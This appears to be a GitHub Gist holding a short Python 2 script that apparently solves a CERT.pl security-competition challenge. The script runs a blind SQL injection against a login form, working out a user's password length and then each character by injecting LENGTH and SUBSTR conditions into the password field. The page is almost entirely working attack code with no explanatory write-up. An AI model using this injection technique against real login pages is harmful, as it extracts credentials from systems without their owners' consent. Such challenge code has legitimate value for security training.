Last active
February 18, 2019 11:46
-
-
Save pawlos/44301c5888cb757af2eb2d9e0ebcb4d6 to your computer and use it in GitHub Desktop.
Script to extract passwords
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
username = 'hacker' | |
for password_length in range(1,30): | |
password = "' or (username = '"+username+"' and LENGTH(password)="+str(password_length)+")-- " | |
result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password}) | |
if 'Logged in successfully' in result.text: | |
break | |
elif 'Internal Server Error' in result.text: | |
print 'Error in query' | |
break | |
print 'Password length: ', password_length | |
extracted = '' | |
password_end = "')-- " | |
i = len(extracted) | |
error = False | |
while not error: | |
if i == password_length: | |
print 'Full password: ', extracted | |
break | |
password_begin = "' or (username = '" +username+"' and SUBSTR(password,"+str(i+1)+",1)='" | |
print 'Extracting char no. ', str(i) | |
for c in xrange(0x20,0x7f): | |
if chr(c) == "'": | |
continue | |
password = password_begin+chr(c)+password_end | |
result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password}) | |
if 'Logged in successfully' in result.text: | |
print 'OK, the char is: ',chr(c) | |
extracted = extracted + chr(c) | |
print 'Whole decoded pass is: ', extracted | |
i = i + 1 | |
break | |
elif 'Internal Server Error' in result.text: | |
print password | |
print 'Error in query' | |
error = True | |
break | |
else: | |
pass | |
print 'Whole range done.' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment